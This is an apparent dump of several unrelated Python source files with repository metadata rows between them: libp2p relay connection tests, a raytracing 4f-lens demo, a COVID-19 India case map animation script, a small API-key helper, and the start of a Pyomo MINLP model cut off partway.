relay_peer = self.relay.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection = _make_libp2p_connection(
data_dir=temp_dir_1,
port=DEFAULT_PORT + 3,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer = Multiplexer([self.connection], protocols=[DefaultMessage])
self.multiplexer.connect()
self.log_files.append(self.connection.node.log_file)
self.multiplexers.append(self.multiplexer)
temp_dir_2 = os.path.join(self.t, "temp_dir_2")
os.mkdir(temp_dir_2)
self.connection2 = _make_libp2p_connection(
data_dir=temp_dir_2,
port=DEFAULT_PORT + 4,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.multiplexer2.connect()
self.log_files.append(self.connection2.node.log_file)
self.multiplexers.append(self.multiplexer2)
def test_connection_is_established(self):
"""Test connection established."""
assert self.relay.is_connected is True
assert self.connection.is_connected is True
assert self.connection2.is_connected is True
def test_envelope_routed_from_peer_after_relay_restart(self):
"""Test envelope routed from third peer after relay restart."""
addr_1 = self.genesis.address
addr_2 = self.connection.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer_genesis.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer_genesis.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
def test_envelope_routed_from_client_after_relay_restart(self):
"""Test envelope routed from third relay client after relay restart."""
addr_1 = self.connection.address
addr_2 = self.connection2.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_1,
sender=addr_2,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer2.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_1,
sender=addr_2,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
time.sleep(5)
self.multiplexer2.put(envelope)
delivered_envelope = self.multiplexer.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
@libp2p_log_on_failure_all
class TestLibp2pConnectionRelayNodeRestartOutgoingEnvelopes(BaseTestLibp2pRelay):
"""Test that connection will reliably route envelope to destination in case of relay node restart within timeout"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(
data_dir=temp_dir_gen, port=DEFAULT_PORT + 1, build_directory=self.t
)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.multiplexer_genesis.connect()
self.log_files.append(self.genesis.node.log_file)
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
file = "node_key"
make_crypto(DEFAULT_LEDGER).dump(file)
self.relay_key_path = file
temp_dir_rel = os.path.join(self.t, "temp_dir_rel")
os.mkdir(temp_dir_rel)
self.relay = _make_libp2p_connection(
data_dir=temp_dir_rel,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
node_key_file=self.relay_key_path,
build_directory=self.t,
)
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.log_files.append(self.relay.node.log_file)
self.multiplexers.append(self.multiplexer_relay)
relay_peer = self.relay.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection = _make_libp2p_connection(
data_dir=temp_dir_1,
port=DEFAULT_PORT + 3,
relay=False,
entry_peers=[relay_peer],
build_directory=self.t,
)
self.multiplexer = Multiplexer([self.connection], protocols=[DefaultMessage])
self.multiplexer.connect()
self.log_files.append(self.connection.node.log_file)
self.multiplexers.append(self.multiplexer)
def test_connection_is_established(self):
"""Test connection established."""
assert self.relay.is_connected is True
assert self.connection.is_connected is True
def test_envelope_routed_after_relay_restart(self):
"""Test envelope routed after relay restart."""
addr_1 = self.connection.address
addr_2 = self.genesis.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer.put(envelope)
delivered_envelope = self.multiplexer_genesis.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer_relay.disconnect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=False)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterRestart",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer.put(envelope)
time.sleep(5)
# currently, multiplexer cannot be restarted
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.change_state_and_wait(self.multiplexer_relay, expected_is_connected=True)
self.multiplexers.append(self.multiplexer_relay)
delivered_envelope = self.multiplexer_genesis.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
@libp2p_log_on_failure_all
class TestLibp2pConnectionAgentMobility(BaseTestLibp2pRelay):
"""Test that connection will correctly route envelope to destination that changed its peer"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(data_dir=temp_dir_gen, port=DEFAULT_PORT)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.log_files.append(self.genesis.node.log_file)
self.multiplexer_genesis.connect()
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
temp_dir_1 = os.path.join(self.t, "temp_dir_1")
os.mkdir(temp_dir_1)
self.connection1 = _make_libp2p_connection(
data_dir=temp_dir_1, port=DEFAULT_PORT + 1, entry_peers=[genesis_peer]
)
self.multiplexer1 = Multiplexer([self.connection1], protocols=[DefaultMessage])
self.log_files.append(self.connection1.node.log_file)
self.multiplexer1.connect()
self.multiplexers.append(self.multiplexer1)
self.connection_key = make_crypto(DEFAULT_LEDGER)
temp_dir_2 = os.path.join(self.t, "temp_dir_2")
os.mkdir(temp_dir_2)
self.connection2 = _make_libp2p_connection(
data_dir=temp_dir_2,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
agent_key=self.connection_key,
)
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.log_files.append(self.connection2.node.log_file)
self.multiplexer2.connect()
self.multiplexers.append(self.multiplexer2)
def test_connection_is_established(self):
"""Test connection established."""
assert self.connection1.is_connected is True
assert self.connection2.is_connected is True
def test_envelope_routed_after_peer_changed(self):
"""Test envelope routed after peer changed."""
addr_1 = self.connection1.address
addr_2 = self.connection2.address
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"hello",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=DefaultMessage.protocol_specification_id,
message=DefaultSerializer().encode(msg),
)
self.multiplexer1.put(envelope)
delivered_envelope = self.multiplexer2.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
self.multiplexer2.disconnect()
self.change_state_and_wait(self.multiplexer2, expected_is_connected=False)
# currently, multiplexer cannot be restarted
self.multiplexer2 = Multiplexer([self.connection2], protocols=[DefaultMessage])
self.multiplexer2.connect()
self.change_state_and_wait(self.multiplexer2, expected_is_connected=True)
self.multiplexers.append(self.multiplexer2)
msg = DefaultMessage(
dialogue_reference=("", ""),
message_id=1,
target=0,
performative=DefaultMessage.Performative.BYTES,
content=b"helloAfterChangingPeer",
)
envelope = Envelope(
to=addr_2,
sender=addr_1,
protocol_specification_id=msg.protocol_specification_id,
message=msg.encode(),
)
self.multiplexer1.put(envelope)
delivered_envelope = self.multiplexer2.get(block=True, timeout=20)
assert delivered_envelope is not None
assert delivered_envelope.to == envelope.to
assert delivered_envelope.sender == envelope.sender
assert (
delivered_envelope.protocol_specification_id
== envelope.protocol_specification_id
)
assert delivered_envelope.message_bytes == envelope.message_bytes
| 37.027223
| 119
| 0.660082
| 2,216
| 20,402
| 5.830776
| 0.112365
| 0.058045
| 0.071202
| 0.038387
| 0.817197
| 0.796455
| 0.77881
| 0.771922
| 0.762867
| 0.747852
| 0
| 0.011807
| 0.248603
| 20,402
| 550
| 120
| 37.094545
| 0.83105
| 0.097981
| 0
| 0.742317
| 0
| 0
| 0.012006
| 0.001206
| 0
| 0
| 0
| 0
| 0.111111
| 1
| 0.030733
| false
| 0.002364
| 0.033097
| 0
| 0.073286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81cf2bb4801bb9bbba82503054f26f28d02a2b6c
| 1,872
|
py
|
Python
|
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | 1
|
2021-04-20T09:38:05.000Z
|
2021-04-20T09:38:05.000Z
|
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | null | null | null |
examples/invariant.py
|
gregsadetsky/RayTracing
|
3d11ed91014a47bddc797495ca2af059005e810d
|
[
"MIT"
] | 2
|
2021-04-20T09:38:06.000Z
|
2022-02-20T23:45:18.000Z
|
import envexamples
from raytracing import *
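# Each block below builds a 4f imaging system with ImagingPath and displays the ray trace;
# the commented-out saveFigure() calls would export the corresponding figures.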
path = ImagingPath()
path.name = "4f system, 1 cm object, small lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=2.5))
path.append(Space(d=10))
path.display()
#path.saveFigure('object-smallLenses.png')
path = ImagingPath()
path.name = "4f system, 1 cm object, small and large lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5))
path.append(Space(d=10))
path.display()
#path.saveFigure('object-smallLargeLenses.png')
path = ImagingPath()
path.name = "4f system, calculated field of view, small lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=2.5))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-smallLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
path = ImagingPath()
path.name = "4f system, improved field of view, small and large lenses"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=2.5))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5.0))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-smallLargeLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
path = ImagingPath()
path.name = "4f systeme, no change in field of view with large first lens"
path.append(Space(d=5))
path.append(Lens(f=5, diameter=5.0))
path.append(Space(d=15))
path.append(Lens(f=10,diameter=5.0))
path.append(Space(d=10))
path.display(onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
#path.saveFigure('fov-largeLenses.png', onlyChiefAndMarginalRays=True, limitObjectToFieldOfView=True)
| 35.320755
| 106
| 0.769765
| 284
| 1,872
| 5.073944
| 0.169014
| 0.173491
| 0.156142
| 0.166551
| 0.869535
| 0.828591
| 0.824427
| 0.797363
| 0.797363
| 0.797363
| 0
| 0.037909
| 0.069979
| 1,872
| 52
| 107
| 36
| 0.789776
| 0.209402
| 0
| 0.785714
| 0
| 0
| 0.168136
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.047619
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81dea810f1e07b5dacb2854b8d5697b9bb0990bb
| 7,736
|
py
|
Python
|
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
time_map.py
|
SriyaR/Coronavirus-Time-Space-Spread-India
|
6b78ff1541cb60f209423a2c06e97b368c238614
|
[
"CC0-1.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""time-map.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1-2jgIeLZg107TIwVKDXWfjL07ddYnLuP
"""
import cv2
import os
import json
import matplotlib.pyplot as plt
import matplotlib.cm
from mpl_toolkits.basemap import Basemap
from matplotlib.patches import Polygon
from matplotlib.collections import PatchCollection
from matplotlib.colors import Normalize
import numpy as np
from matplotlib.colors import rgb2hex, Normalize
from matplotlib.cm import ScalarMappable
from matplotlib.colorbar import ColorbarBase
import matplotlib.animation as animation
with open('INDIA/data.json') as json_file:
data = json.load(json_file)
#Color bar depends on Confirmed Cases on that Day
folder = "IMAGES"
for ind in range(len(data['data'])):
color_dict = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][ind]['regional'])):
color_dict[data['data'][ind]['regional'][j]['loc']] = data['data'][ind]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict.keys():
color_dict[j] = 0
#As our coordinates do not incorporate separation of Ladakh from Jammu & Kashmir
color_dict["Jammu and Kashmir"] += color_dict["Ladakh"]
del color_dict["Ladakh"]
fig, ax = plt.subplots()
#Obtain position coordinates from https://boundingbox.klokantech.com/
m = Basemap(resolution='c',projection='merc',lat_0=54.5,lon_0=-4.36,llcrnrlon=68., llcrnrlat=6., urcrnrlat=37., urcrnrlon=97.)
m.drawmapboundary(fill_color='#46bcec')
m.fillcontinents(color='#f2f2f2', lake_color='#46bcec')
m.drawcoastlines()
#contains all state position coordinates
m.readshapefile("INDIA/IND_adm1","INDIA")
colors={}
statenames=[]
patches = []
#Colormap
cmap = plt.cm.Reds
#Colorbar Range
vmin = min(color_dict.values()); vmax = max(color_dict.values())
norm = Normalize(vmin=vmin, vmax=vmax)
# color mapper to convert values to colors
mapper = ScalarMappable(norm=norm, cmap=cmap)
for shapedict in m.INDIA_info:
statename = shapedict['NAME_1']
#To incorporate difference between Map State Name and Data Loc Name
if statename == "Telangana":
statename = "Telengana"
if statename in color_dict:
pop = color_dict[statename]
colors[statename] = mapper.to_rgba(pop)
statenames.append(statename)
for nshape,seg in enumerate(m.INDIA):
color = rgb2hex(colors[statenames[nshape]])
poly = Polygon(seg,facecolor=color,edgecolor=color)
ax.add_patch(poly)
plt.title('Confirmed Cases on '+ data['data'][ind]['day'])
cax = fig.add_axes([0.27, 0.1, 0.5, 0.05]) # position
cb = ColorbarBase(cax,cmap=cmap,norm=norm, orientation='horizontal')
cb.ax.set_xlabel('Number of Cases')
fig1 = plt.gcf()
plt.show()
fig1.savefig(folder + "/file%02d.png" % ind)
video_name = 'time_map.avi'
images = [img for img in os.listdir(folder) if img.endswith(".png")]
frame = cv2.imread(os.path.join(folder, images[0]))
height, width, layers = frame.shape
#0.7 is the fps (frames per second)
video = cv2.VideoWriter(video_name, 0, 0.7, (width,height))
for image in sorted(images):
video.write(cv2.imread(os.path.join(folder, image)))
cv2.destroyAllWindows()
video.release()
#With Uniform colorbar across images
index = len(data['data'])-1
color_dict_last = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][index]['regional'])):
color_dict_last[data['data'][index]['regional'][j]['loc']] = data['data'][index]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict_last.keys():
color_dict_last[j] = 0
#As our coordinates do not incorporate separation of Ladakh from Jammu & Kashmir
color_dict_last["Jammu and Kashmir"] += color_dict_last["Ladakh"]
del color_dict_last["Ladakh"]
folder = "IMAGES_UNIFORM"
for ind in range(len(data['data'])):
color_dict = {}
color_list = ["Andaman and Nicobar","Andhra Pradesh","Arunachal Pradesh","Assam","Bihar","Chandigarh","Chhattisgarh","Dadra and Nagar Haveli","Daman and Diu","Delhi","Goa","Gujarat","Haryana","Himachal Pradesh","Jammu and Kashmir","Jharkhand","Karnataka","Kerala","Lakshadweep","Madhya Pradesh","Maharashtra","Manipur","Meghalaya","Mizoram","Nagaland","Orissa","Puducherry","Punjab","Rajasthan","Sikkim","Tamil Nadu","Telengana","Tripura","Uttar Pradesh","Uttaranchal","West Bengal",]
for j in range(len(data['data'][ind]['regional'])):
color_dict[data['data'][ind]['regional'][j]['loc']] = data['data'][ind]['regional'][j]['totalConfirmed']
for j in color_list:
if j not in color_dict.keys():
color_dict[j] = 0
#As our coordinates do not incorporate separation of Ladakh from Jammu & Kashmir
color_dict["Jammu and Kashmir"] += color_dict["Ladakh"]
del color_dict["Ladakh"]
fig, ax = plt.subplots()
#Obtain position coordinates from https://boundingbox.klokantech.com/
m = Basemap(resolution='c',projection='merc',lat_0=54.5,lon_0=-4.36,llcrnrlon=68., llcrnrlat=6., urcrnrlat=37., urcrnrlon=97.)
m.drawmapboundary(fill_color='#46bcec')
m.fillcontinents(color='#f2f2f2', lake_color='#46bcec')
m.drawcoastlines()
#contains all state position coordinates
m.readshapefile("IND_adm1","INDIA")
colors={}
statenames=[]
patches = []
#Reversed Color Map
cmap = plt.cm.get_cmap('hot_r')
vmin = min(color_dict.values()); vmax = max(color_dict_last.values())
#Colorbar Range
norm = Normalize(vmin=vmin, vmax=vmax)
# color mapper to convert values to colors
mapper = ScalarMappable(norm=norm, cmap=cmap)
for shapedict in m.INDIA_info:
statename = shapedict['NAME_1']
#To incorporate difference between Map State Name and Data Loc Name
if statename == "Telangana":
statename = "Telengana"
if statename in color_dict:
pop = color_dict[statename]
colors[statename] = mapper.to_rgba(pop)
statenames.append(statename)
for nshape,seg in enumerate(m.INDIA):
color = rgb2hex(colors[statenames[nshape]])
poly = Polygon(seg,facecolor=color,edgecolor=color)
ax.add_patch(poly)
plt.title('Confirmed Cases on '+ data['data'][ind]['day'])
cax = fig.add_axes([0.27, 0.1, 0.5, 0.05]) # position
cb = ColorbarBase(cax,cmap=cmap,norm=norm, orientation='horizontal')
cb.ax.set_xlabel('Number of Cases')
fig1 = plt.gcf()
plt.show()
fig1.savefig(folder + "/file%02d.png" % ind)
video_name = 'time_map_uniform.avi'
images = [img for img in os.listdir(folder) if img.endswith(".png")]
frame = cv2.imread(os.path.join(folder, images[0]))
height, width, layers = frame.shape
video = cv2.VideoWriter(video_name, 0, 1, (width,height))
for image in sorted(images):
video.write(cv2.imread(os.path.join(folder, image)))
cv2.destroyAllWindows()
video.release()
| 42.740331
| 486
| 0.708635
| 1,059
| 7,736
| 5.102927
| 0.237016
| 0.048298
| 0.016284
| 0.021095
| 0.826055
| 0.814582
| 0.790896
| 0.790896
| 0.790896
| 0.776832
| 0
| 0.016232
| 0.13198
| 7,736
| 181
| 487
| 42.740331
| 0.788533
| 0.134436
| 0
| 0.723077
| 1
| 0
| 0.252024
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.107692
| 0
| 0.107692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1eebc44279b5e679d8ef84689ed368209507456d
| 122
|
py
|
Python
|
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | 3
|
2020-12-17T00:52:17.000Z
|
2021-08-06T15:22:03.000Z
|
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | null | null | null |
news/utils.py
|
yxor/neonews
|
34a506fcc4084f9d37b98801d260fca09582fed3
|
[
"MIT"
] | 1
|
2021-02-16T19:22:13.000Z
|
2021-02-16T19:22:13.000Z
|
""" a file with with utility functions """
import secrets
def generate_api_key():
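# 16 random bytes, URL-safe base64 encoded (roughly 22 characters).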
return secrets.token_urlsafe(16)
| 15.25
| 42
| 0.729508
| 17
| 122
| 5.058824
| 0.882353
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.019802
| 0.172131
| 122
| 7
| 43
| 17.428571
| 0.831683
| 0.278689
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
484558a71b238b996f17ec28e2d1d8c35614cfc9
| 173,889
|
py
|
Python
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 2
|
2021-07-03T13:19:10.000Z
|
2022-02-06T10:48:13.000Z
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | 1
|
2021-07-04T14:52:14.000Z
|
2021-07-15T10:17:11.000Z
|
tests/examples/minlplib/sfacloc1_4_80.py
|
ouyang-w-19/decogo
|
52546480e49776251d4d27856e18a46f40c824a1
|
[
"MIT"
] | null | null | null |
# MINLP written by GAMS Convert at 04/21/18 13:54:10
#
# Equation counts
# Total E G L N X C B
# 2235 106 2110 19 0 0 0 0
#
# Variable counts
# x b i s1s s2s sc si
# Total cont binary integer sos1 sos2 scont sint
# 356 294 62 0 0 0 0 0
# FX 0 0 0 0 0 0 0 0
#
# Nonzero counts
# Total const NL DLL
# 8025 7890 135 0
#
# Reformulation has removed 1 variable and 1 equation
from pyomo.environ import *
model = m = ConcreteModel()
m.x1 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x2 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x3 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x4 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x5 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x6 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x7 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x8 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x9 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x10 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x11 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x12 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x13 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x14 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x15 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x16 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x17 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x18 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x19 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x20 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x21 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x22 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x23 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x24 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x25 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x26 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x27 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x28 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x29 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x30 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x31 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x32 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x33 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x34 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x35 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x36 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x37 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x38 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x39 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x40 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x41 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x42 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x43 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x44 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x45 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x46 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x47 = Var(within=Reals,bounds=(0,1),initialize=0)
m.x48 = Var(within=Reals,bounds=(0,1),initialize=0)
